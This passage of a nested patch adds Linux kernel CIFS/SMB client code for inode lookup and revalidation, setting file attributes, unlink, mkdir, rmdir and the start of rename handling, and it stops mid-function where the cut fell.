++		if (!*inode)
++			rc = -ENOMEM;
++	} else {
++		/* we already have inode, update it */
++
++		/* if uniqueid is different, return error */
++		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
++		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
++			CIFS_I(*inode)->time = 0; /* force reval */
++			rc = -ESTALE;
++			goto out;
++		}
++		/* if filetype is different, return error */
++		rc = cifs_fattr_to_inode(*inode, &fattr);
++	}
++out:
++	cifs_buf_release(smb1_backup_rsp_buf);
++	cifs_put_tlink(tlink);
++	cifs_free_open_info(&tmp_data);
++	kfree(fattr.cf_symlink_target);
++	return rc;
++}
++
++int
++smb311_posix_get_inode_info(struct inode **inode,
++		    const char *full_path,
++		    struct super_block *sb, unsigned int xid)
++{
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	bool adjust_tz = false;
++	struct cifs_fattr fattr = {0};
++	bool symlink = false;
++	struct cifs_open_info_data data = {};
++	int rc = 0;
++	int tmprc = 0;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	/*
++	 * 1. Fetch file metadata
++	 */
++
++	if (is_inode_cache_good(*inode)) {
++		cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
++		goto out;
++	}
++
++	rc = smb311_posix_query_path_info(xid, tcon, cifs_sb, full_path, &data, &adjust_tz,
++					  &symlink);
++
++	/*
++	 * 2. Convert it to internal cifs metadata (fattr)
++	 */
++
++	switch (rc) {
++	case 0:
++		smb311_posix_info_to_fattr(&fattr, &data, sb, adjust_tz, symlink);
++		break;
++	case -EREMOTE:
++		/* DFS link, no metadata available on this server */
++		cifs_create_dfs_fattr(&fattr, sb);
++		rc = 0;
++		break;
++	case -EACCES:
++		/*
++		 * For SMB2 and later the backup intent flag
++		 * is already sent if needed on open and there
++		 * is no path based FindFirst operation to use
++		 * to retry with so nothing we can do, bail out
++		 */
++		goto out;
++	default:
++		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
++		goto out;
++	}
++
++
++	/*
++	 * 3. Tweak fattr based on mount options
++	 */
++
++	/* check for Minshall+French symlinks */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
++		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
++					 full_path);
++		if (tmprc)
++			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
++	}
++
++	/*
++	 * 4. Update inode with final fattr data
++	 */
++
++	if (!*inode) {
++		*inode = cifs_iget(sb, &fattr);
++		if (!*inode)
++			rc = -ENOMEM;
++	} else {
++		/* we already have inode, update it */
++
++		/* if uniqueid is different, return error */
++		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
++		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
++			CIFS_I(*inode)->time = 0; /* force reval */
++			rc = -ESTALE;
++			goto out;
++		}
++
++		/* if filetype is different, return error */
++		rc = cifs_fattr_to_inode(*inode, &fattr);
++	}
++out:
++	cifs_put_tlink(tlink);
++	cifs_free_open_info(&data);
++	kfree(fattr.cf_symlink_target);
++	return rc;
++}
++
++
++static const struct inode_operations cifs_ipc_inode_ops = {
++	.lookup = cifs_lookup,
++};
++
++static int
++cifs_find_inode(struct inode *inode, void *opaque)
++{
++	struct cifs_fattr *fattr = opaque;
++
++	/* don't match inode with different uniqueid */
++	if (CIFS_I(inode)->uniqueid != fattr->cf_uniqueid)
++		return 0;
++
++	/* use createtime like an i_generation field */
++	if (CIFS_I(inode)->createtime != fattr->cf_createtime)
++		return 0;
++
++	/* don't match inode of different type */
++	if (inode_wrong_type(inode, fattr->cf_mode))
++		return 0;
++
++	/* if it's not a directory or has no dentries, then flag it */
++	if (S_ISDIR(inode->i_mode) && !hlist_empty(&inode->i_dentry))
++		fattr->cf_flags |= CIFS_FATTR_INO_COLLISION;
++
++	return 1;
++}
++
++static int
++cifs_init_inode(struct inode *inode, void *opaque)
++{
++	struct cifs_fattr *fattr = opaque;
++
++	CIFS_I(inode)->uniqueid = fattr->cf_uniqueid;
++	CIFS_I(inode)->createtime = fattr->cf_createtime;
++	return 0;
++}
++
++/*
++ * walk dentry list for an inode and report whether it has aliases that
++ * are hashed. We use this to determine if a directory inode can actually
++ * be used.
++ */
++static bool
++inode_has_hashed_dentries(struct inode *inode)
++{
++	struct dentry *dentry;
++
++	spin_lock(&inode->i_lock);
++	hlist_for_each_entry(dentry, &inode->i_dentry, d_u.d_alias) {
++		if (!d_unhashed(dentry) || IS_ROOT(dentry)) {
++			spin_unlock(&inode->i_lock);
++			return true;
++		}
++	}
++	spin_unlock(&inode->i_lock);
++	return false;
++}
++
++/* Given fattrs, get a corresponding inode */
++struct inode *
++cifs_iget(struct super_block *sb, struct cifs_fattr *fattr)
++{
++	unsigned long hash;
++	struct inode *inode;
++
++retry_iget5_locked:
++	cifs_dbg(FYI, "looking for uniqueid=%llu\n", fattr->cf_uniqueid);
++
++	/* hash down to 32-bits on 32-bit arch */
++	hash = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
++
++	inode = iget5_locked(sb, hash, cifs_find_inode, cifs_init_inode, fattr);
++	if (inode) {
++		/* was there a potentially problematic inode collision? */
++		if (fattr->cf_flags & CIFS_FATTR_INO_COLLISION) {
++			fattr->cf_flags &= ~CIFS_FATTR_INO_COLLISION;
++
++			if (inode_has_hashed_dentries(inode)) {
++				cifs_autodisable_serverino(CIFS_SB(sb));
++				iput(inode);
++				fattr->cf_uniqueid = iunique(sb, ROOT_I);
++				goto retry_iget5_locked;
++			}
++		}
++
++		/* can't fail - see cifs_find_inode() */
++		cifs_fattr_to_inode(inode, fattr);
++		if (sb->s_flags & SB_NOATIME)
++			inode->i_flags |= S_NOATIME | S_NOCMTIME;
++		if (inode->i_state & I_NEW) {
++			inode->i_ino = hash;
++			cifs_fscache_get_inode_cookie(inode);
++			unlock_new_inode(inode);
++		}
++	}
++
++	return inode;
++}
++
++/* gets root inode */
++struct inode *cifs_root_iget(struct super_block *sb)
++{
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct inode *inode = NULL;
++	long rc;
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	char *path = NULL;
++	int len;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
++	    && cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath);
++		path = kzalloc(len + 2 /* leading sep + null */, GFP_KERNEL);
++		if (path == NULL)
++			return ERR_PTR(-ENOMEM);
++		path[0] = '/';
++		memcpy(path+1, cifs_sb->prepath, len);
++	} else {
++		path = kstrdup("", GFP_KERNEL);
++		if (path == NULL)
++			return ERR_PTR(-ENOMEM);
++	}
++
++	xid = get_xid();
++	if (tcon->unix_ext) {
++		rc = cifs_get_inode_info_unix(&inode, path, sb, xid);
++		/* some servers mistakenly claim POSIX support */
++		if (rc != -EOPNOTSUPP)
++			goto iget_no_retry;
++		cifs_dbg(VFS, "server does not support POSIX extensions\n");
++		tcon->unix_ext = false;
++	}
++
++	convert_delimiter(path, CIFS_DIR_SEP(cifs_sb));
++	if (tcon->posix_extensions)
++		rc = smb311_posix_get_inode_info(&inode, path, sb, xid);
++	else
++		rc = cifs_get_inode_info(&inode, path, NULL, sb, xid, NULL);
++
++iget_no_retry:
++	if (!inode) {
++		inode = ERR_PTR(rc);
++		goto out;
++	}
++
++	if (rc && tcon->pipe) {
++		cifs_dbg(FYI, "ipc connection - fake read inode\n");
++		spin_lock(&inode->i_lock);
++		inode->i_mode |= S_IFDIR;
++		set_nlink(inode, 2);
++		inode->i_op = &cifs_ipc_inode_ops;
++		inode->i_fop = &simple_dir_operations;
++		inode->i_uid = cifs_sb->ctx->linux_uid;
++		inode->i_gid = cifs_sb->ctx->linux_gid;
++		spin_unlock(&inode->i_lock);
++	} else if (rc) {
++		iget_failed(inode);
++		inode = ERR_PTR(rc);
++	}
++
++out:
++	kfree(path);
++	free_xid(xid);
++	return inode;
++}
++
++int
++cifs_set_file_info(struct inode *inode, struct iattr *attrs, unsigned int xid,
++		   const char *full_path, __u32 dosattr)
++{
++	bool set_time = false;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct TCP_Server_Info *server;
++	FILE_BASIC_INFO	info_buf;
++
++	if (attrs == NULL)
++		return -EINVAL;
++
++	server = cifs_sb_master_tcon(cifs_sb)->ses->server;
++	if (!server->ops->set_file_info)
++		return -ENOSYS;
++
++	info_buf.Pad = 0;
++
++	if (attrs->ia_valid & ATTR_ATIME) {
++		set_time = true;
++		info_buf.LastAccessTime =
++			cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_atime));
++	} else
++		info_buf.LastAccessTime = 0;
++
++	if (attrs->ia_valid & ATTR_MTIME) {
++		set_time = true;
++		info_buf.LastWriteTime =
++		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_mtime));
++	} else
++		info_buf.LastWriteTime = 0;
++
++	/*
++	 * Samba throws this field away, but windows may actually use it.
++	 * Do not set ctime unless other time stamps are changed explicitly
++	 * (i.e. by utimes()) since we would then have a mix of client and
++	 * server times.
++	 */
++	if (set_time && (attrs->ia_valid & ATTR_CTIME)) {
++		cifs_dbg(FYI, "CIFS - CTIME changed\n");
++		info_buf.ChangeTime =
++		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_ctime));
++	} else
++		info_buf.ChangeTime = 0;
++
++	info_buf.CreationTime = 0;	/* don't change */
++	info_buf.Attributes = cpu_to_le32(dosattr);
++
++	return server->ops->set_file_info(inode, full_path, &info_buf, xid);
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/*
++ * Open the given file (if it isn't already), set the DELETE_ON_CLOSE bit
++ * and rename it to a random name that hopefully won't conflict with
++ * anything else.
++ */
++int
++cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
++			   const unsigned int xid)
++{
++	int oplock = 0;
++	int rc;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	__u32 dosattr, origattr;
++	FILE_BASIC_INFO *info_buf = NULL;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	/*
++	 * We cannot rename the file if the server doesn't support
++	 * CAP_INFOLEVEL_PASSTHRU
++	 */
++	if (!(tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)) {
++		rc = -EBUSY;
++		goto out;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc != 0)
++		goto out;
++
++	origattr = cifsInode->cifsAttrs;
++	if (origattr == 0)
++		origattr |= ATTR_NORMAL;
++
++	dosattr = origattr & ~ATTR_READONLY;
++	if (dosattr == 0)
++		dosattr |= ATTR_NORMAL;
++	dosattr |= ATTR_HIDDEN;
++
++	/* set ATTR_HIDDEN and clear ATTR_READONLY, but only if needed */
++	if (dosattr != origattr) {
++		info_buf = kzalloc(sizeof(*info_buf), GFP_KERNEL);
++		if (info_buf == NULL) {
++			rc = -ENOMEM;
++			goto out_close;
++		}
++		info_buf->Attributes = cpu_to_le32(dosattr);
++		rc = CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
++					current->tgid);
++		/* although we would like to mark the file hidden
++ 		   if that fails we will still try to rename it */
++		if (!rc)
++			cifsInode->cifsAttrs = dosattr;
++		else
++			dosattr = origattr; /* since not able to change them */
++	}
++
++	/* rename the file */
++	rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, NULL,
++				   cifs_sb->local_nls,
++				   cifs_remap(cifs_sb));
++	if (rc != 0) {
++		rc = -EBUSY;
++		goto undo_setattr;
++	}
++
++	/* try to set DELETE_ON_CLOSE */
++	if (!test_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags)) {
++		rc = CIFSSMBSetFileDisposition(xid, tcon, true, fid.netfid,
++					       current->tgid);
++		/*
++		 * some samba versions return -ENOENT when we try to set the
++		 * file disposition here. Likely a samba bug, but work around
++		 * it for now. This means that some cifsXXX files may hang
++		 * around after they shouldn't.
++		 *
++		 * BB: remove this hack after more servers have the fix
++		 */
++		if (rc == -ENOENT)
++			rc = 0;
++		else if (rc != 0) {
++			rc = -EBUSY;
++			goto undo_rename;
++		}
++		set_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags);
++	}
++
++out_close:
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	kfree(info_buf);
++	cifs_put_tlink(tlink);
++	return rc;
++
++	/*
++	 * reset everything back to the original state. Don't bother
++	 * dealing with errors here since we can't do anything about
++	 * them anyway.
++	 */
++undo_rename:
++	CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, dentry->d_name.name,
++				cifs_sb->local_nls, cifs_remap(cifs_sb));
++undo_setattr:
++	if (dosattr != origattr) {
++		info_buf->Attributes = cpu_to_le32(origattr);
++		if (!CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
++					current->tgid))
++			cifsInode->cifsAttrs = origattr;
++	}
++
++	goto out_close;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/* copied from fs/nfs/dir.c with small changes */
++static void
++cifs_drop_nlink(struct inode *inode)
++{
++	spin_lock(&inode->i_lock);
++	if (inode->i_nlink > 0)
++		drop_nlink(inode);
++	spin_unlock(&inode->i_lock);
++}
++
++/*
++ * If d_inode(dentry) is null (usually meaning the cached dentry
++ * is a negative dentry) then we would attempt a standard SMB delete, but
++ * if that fails we can not attempt the fall back mechanisms on EACCES
++ * but will return the EACCES to the caller. Note that the VFS does not call
++ * unlink on negative dentries currently.
++ */
++int cifs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	int rc = 0;
++	unsigned int xid;
++	const char *full_path;
++	void *page;
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cifs_inode;
++	struct super_block *sb = dir->i_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct iattr *attrs = NULL;
++	__u32 dosattr = 0, origattr = 0;
++
++	cifs_dbg(FYI, "cifs_unlink, dir=0x%p, dentry=0x%p\n", dir, dentry);
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	if (tcon->nodelete) {
++		rc = -EACCES;
++		goto unlink_out;
++	}
++
++	/* Unlink can be called from rename so we can not take the
++	 * sb->s_vfs_rename_mutex here */
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto unlink_out;
++	}
++
++	cifs_close_deferred_file_under_dentry(tcon, full_path);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		rc = CIFSPOSIXDelFile(xid, tcon, full_path,
++			SMB_POSIX_UNLINK_FILE_TARGET, cifs_sb->local_nls,
++			cifs_remap(cifs_sb));
++		cifs_dbg(FYI, "posix del rc %d\n", rc);
++		if ((rc == 0) || (rc == -ENOENT))
++			goto psx_del_no_retry;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++retry_std_delete:
++	if (!server->ops->unlink) {
++		rc = -ENOSYS;
++		goto psx_del_no_retry;
++	}
++
++	rc = server->ops->unlink(xid, tcon, full_path, cifs_sb);
++
++psx_del_no_retry:
++	if (!rc) {
++		if (inode)
++			cifs_drop_nlink(inode);
++	} else if (rc == -ENOENT) {
++		d_drop(dentry);
++	} else if (rc == -EBUSY) {
++		if (server->ops->rename_pending_delete) {
++			rc = server->ops->rename_pending_delete(full_path,
++								dentry, xid);
++			if (rc == 0)
++				cifs_drop_nlink(inode);
++		}
++	} else if ((rc == -EACCES) && (dosattr == 0) && inode) {
++		attrs = kzalloc(sizeof(*attrs), GFP_KERNEL);
++		if (attrs == NULL) {
++			rc = -ENOMEM;
++			goto out_reval;
++		}
++
++		/* try to reset dos attributes */
++		cifs_inode = CIFS_I(inode);
++		origattr = cifs_inode->cifsAttrs;
++		if (origattr == 0)
++			origattr |= ATTR_NORMAL;
++		dosattr = origattr & ~ATTR_READONLY;
++		if (dosattr == 0)
++			dosattr |= ATTR_NORMAL;
++		dosattr |= ATTR_HIDDEN;
++
++		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
++		if (rc != 0)
++			goto out_reval;
++
++		goto retry_std_delete;
++	}
++
++	/* undo the setattr if we errored out and it's needed */
++	if (rc != 0 && dosattr != 0)
++		cifs_set_file_info(inode, attrs, xid, full_path, origattr);
++
++out_reval:
++	if (inode) {
++		cifs_inode = CIFS_I(inode);
++		cifs_inode->time = 0;	/* will force revalidate to get info
++					   when needed */
++		inode->i_ctime = current_time(inode);
++	}
++	dir->i_ctime = dir->i_mtime = current_time(dir);
++	cifs_inode = CIFS_I(dir);
++	CIFS_I(dir)->time = 0;	/* force revalidate of dir as well */
++unlink_out:
++	free_dentry_path(page);
++	kfree(attrs);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int
++cifs_mkdir_qinfo(struct inode *parent, struct dentry *dentry, umode_t mode,
++		 const char *full_path, struct cifs_sb_info *cifs_sb,
++		 struct cifs_tcon *tcon, const unsigned int xid)
++{
++	int rc = 0;
++	struct inode *inode = NULL;
++
++	if (tcon->posix_extensions)
++		rc = smb311_posix_get_inode_info(&inode, full_path, parent->i_sb, xid);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	else if (tcon->unix_ext)
++		rc = cifs_get_inode_info_unix(&inode, full_path, parent->i_sb,
++					      xid);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	else
++		rc = cifs_get_inode_info(&inode, full_path, NULL, parent->i_sb,
++					 xid, NULL);
++
++	if (rc)
++		return rc;
++
++	if (!S_ISDIR(inode->i_mode)) {
++		/*
++		 * mkdir succeeded, but another client has managed to remove the
++		 * sucker and replace it with non-directory.  Return success,
++		 * but don't leave the child in dcache.
++		 */
++		 iput(inode);
++		 d_drop(dentry);
++		 return 0;
++	}
++	/*
++	 * setting nlink not necessary except in cases where we failed to get it
++	 * from the server or was set bogus. Also, since this is a brand new
++	 * inode, no need to grab the i_lock before setting the i_nlink.
++	 */
++	if (inode->i_nlink < 2)
++		set_nlink(inode, 2);
++	mode &= ~current_umask();
++	/* must turn on setgid bit if parent dir has it */
++	if (parent->i_mode & S_ISGID)
++		mode |= S_ISGID;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext) {
++		struct cifs_unix_set_info_args args = {
++			.mode	= mode,
++			.ctime	= NO_CHANGE_64,
++			.atime	= NO_CHANGE_64,
++			.mtime	= NO_CHANGE_64,
++			.device	= 0,
++		};
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			args.uid = current_fsuid();
++			if (parent->i_mode & S_ISGID)
++				args.gid = parent->i_gid;
++			else
++				args.gid = current_fsgid();
++		} else {
++			args.uid = INVALID_UID; /* no change */
++			args.gid = INVALID_GID; /* no change */
++		}
++		CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
++				       cifs_sb->local_nls,
++				       cifs_remap(cifs_sb));
++	} else {
++#else
++	{
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		struct TCP_Server_Info *server = tcon->ses->server;
++		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
++		    (mode & S_IWUGO) == 0 && server->ops->mkdir_setinfo)
++			server->ops->mkdir_setinfo(inode, full_path, cifs_sb,
++						   tcon, xid);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
++			inode->i_mode = (mode | S_IFDIR);
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			inode->i_uid = current_fsuid();
++			if (inode->i_mode & S_ISGID)
++				inode->i_gid = parent->i_gid;
++			else
++				inode->i_gid = current_fsgid();
++		}
++	}
++	d_instantiate(dentry, inode);
++	return 0;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_posix_mkdir(struct inode *inode, struct dentry *dentry, umode_t mode,
++		 const char *full_path, struct cifs_sb_info *cifs_sb,
++		 struct cifs_tcon *tcon, const unsigned int xid)
++{
++	int rc = 0;
++	u32 oplock = 0;
++	FILE_UNIX_BASIC_INFO *info = NULL;
++	struct inode *newinode = NULL;
++	struct cifs_fattr fattr;
++
++	info = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
++	if (info == NULL) {
++		rc = -ENOMEM;
++		goto posix_mkdir_out;
++	}
++
++	mode &= ~current_umask();
++	rc = CIFSPOSIXCreate(xid, tcon, SMB_O_DIRECTORY | SMB_O_CREAT, mode,
++			     NULL /* netfid */, info, &oplock, full_path,
++			     cifs_sb->local_nls, cifs_remap(cifs_sb));
++	if (rc == -EOPNOTSUPP)
++		goto posix_mkdir_out;
++	else if (rc) {
++		cifs_dbg(FYI, "posix mkdir returned 0x%x\n", rc);
++		d_drop(dentry);
++		goto posix_mkdir_out;
++	}
++
++	if (info->Type == cpu_to_le32(-1))
++		/* no return info, go query for it */
++		goto posix_mkdir_get_info;
++	/*
++	 * BB check (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID ) to see if
++	 * need to set uid/gid.
++	 */
++
++	cifs_unix_basic_to_fattr(&fattr, info, cifs_sb);
++	cifs_fill_uniqueid(inode->i_sb, &fattr);
++	newinode = cifs_iget(inode->i_sb, &fattr);
++	if (!newinode)
++		goto posix_mkdir_get_info;
++
++	d_instantiate(dentry, newinode);
++
++#ifdef CONFIG_CIFS_DEBUG2
++	cifs_dbg(FYI, "instantiated dentry %p %pd to inode %p\n",
++		 dentry, dentry, newinode);
++
++	if (newinode->i_nlink != 2)
++		cifs_dbg(FYI, "unexpected number of links %d\n",
++			 newinode->i_nlink);
++#endif
++
++posix_mkdir_out:
++	kfree(info);
++	return rc;
++posix_mkdir_get_info:
++	rc = cifs_mkdir_qinfo(inode, dentry, mode, full_path, cifs_sb, tcon,
++			      xid);
++	goto posix_mkdir_out;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++int cifs_mkdir(struct user_namespace *mnt_userns, struct inode *inode,
++	       struct dentry *direntry, umode_t mode)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	const char *full_path;
++	void *page;
++
++	cifs_dbg(FYI, "In cifs_mkdir, mode = %04ho inode = 0x%p\n",
++		 mode, inode);
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto mkdir_out;
++	}
++
++	server = tcon->ses->server;
++
++	if ((server->ops->posix_mkdir) && (tcon->posix_extensions)) {
++		rc = server->ops->posix_mkdir(xid, inode, mode, tcon, full_path,
++					      cifs_sb);
++		d_drop(direntry); /* for time being always refresh inode info */
++		goto mkdir_out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		rc = cifs_posix_mkdir(inode, direntry, mode, full_path, cifs_sb,
++				      tcon, xid);
++		if (rc != -EOPNOTSUPP)
++			goto mkdir_out;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (!server->ops->mkdir) {
++		rc = -ENOSYS;
++		goto mkdir_out;
++	}
++
++	/* BB add setting the equivalent of mode via CreateX w/ACLs */
++	rc = server->ops->mkdir(xid, inode, mode, tcon, full_path, cifs_sb);
++	if (rc) {
++		cifs_dbg(FYI, "cifs_mkdir returned 0x%x\n", rc);
++		d_drop(direntry);
++		goto mkdir_out;
++	}
++
++	/* TODO: skip this for smb2/smb3 */
++	rc = cifs_mkdir_qinfo(inode, direntry, mode, full_path, cifs_sb, tcon,
++			      xid);
++mkdir_out:
++	/*
++	 * Force revalidate to get parent dir info when needed since cached
++	 * attributes are invalid now.
++	 */
++	CIFS_I(inode)->time = 0;
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++int cifs_rmdir(struct inode *inode, struct dentry *direntry)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct cifsInodeInfo *cifsInode;
++
++	cifs_dbg(FYI, "cifs_rmdir, inode = 0x%p\n", inode);
++
++	xid = get_xid();
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto rmdir_exit;
++	}
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
++		rc = -EIO;
++		goto rmdir_exit;
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto rmdir_exit;
++	}
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	if (!server->ops->rmdir) {
++		rc = -ENOSYS;
++		cifs_put_tlink(tlink);
++		goto rmdir_exit;
++	}
++
++	if (tcon->nodelete) {
++		rc = -EACCES;
++		cifs_put_tlink(tlink);
++		goto rmdir_exit;
++	}
++
++	rc = server->ops->rmdir(xid, tcon, full_path, cifs_sb);
++	cifs_put_tlink(tlink);
++
++	if (!rc) {
++		spin_lock(&d_inode(direntry)->i_lock);
++		i_size_write(d_inode(direntry), 0);
++		clear_nlink(d_inode(direntry));
++		spin_unlock(&d_inode(direntry)->i_lock);
++	}
++
++	cifsInode = CIFS_I(d_inode(direntry));
++	/* force revalidate to go get info when needed */
++	cifsInode->time = 0;
++
++	cifsInode = CIFS_I(inode);
++	/*
++	 * Force revalidate to get parent dir info when needed since cached
++	 * attributes are invalid now.
++	 */
++	cifsInode->time = 0;
++
++	d_inode(direntry)->i_ctime = inode->i_ctime = inode->i_mtime =
++		current_time(inode);
++
++rmdir_exit:
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
++
++static int
++cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
++	       const char *from_path, struct dentry *to_dentry,
++	       const char *to_path)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(from_dentry->d_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	int oplock;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	int rc;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	if (!server->ops->rename)
++		return -ENOSYS;
++
++	/* try path-based rename first */
++	rc = server->ops->rename(xid, tcon, from_path, to_path, cifs_sb);
++
++	/*
++	 * Don't bother with rename by filehandle unless file is busy and
++	 * source. Note that cross directory moves do not work with
++	 * rename by filehandle to various Windows servers.
++	 */
++	if (rc == 0 || rc != -EBUSY)
++		goto do_rename_exit;
++
++	/* Don't fall back to using SMB on SMB 2+ mount */
++	if (server->vals->protocol_id != 0)
++		goto do_rename_exit;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	/* open-file renames don't work across directories */
++	if (to_dentry->d_parent != from_dentry->d_parent)
++		goto do_rename_exit;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		/* open the file to be renamed -- we need DELETE perms */
++		.desired_access = DELETE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
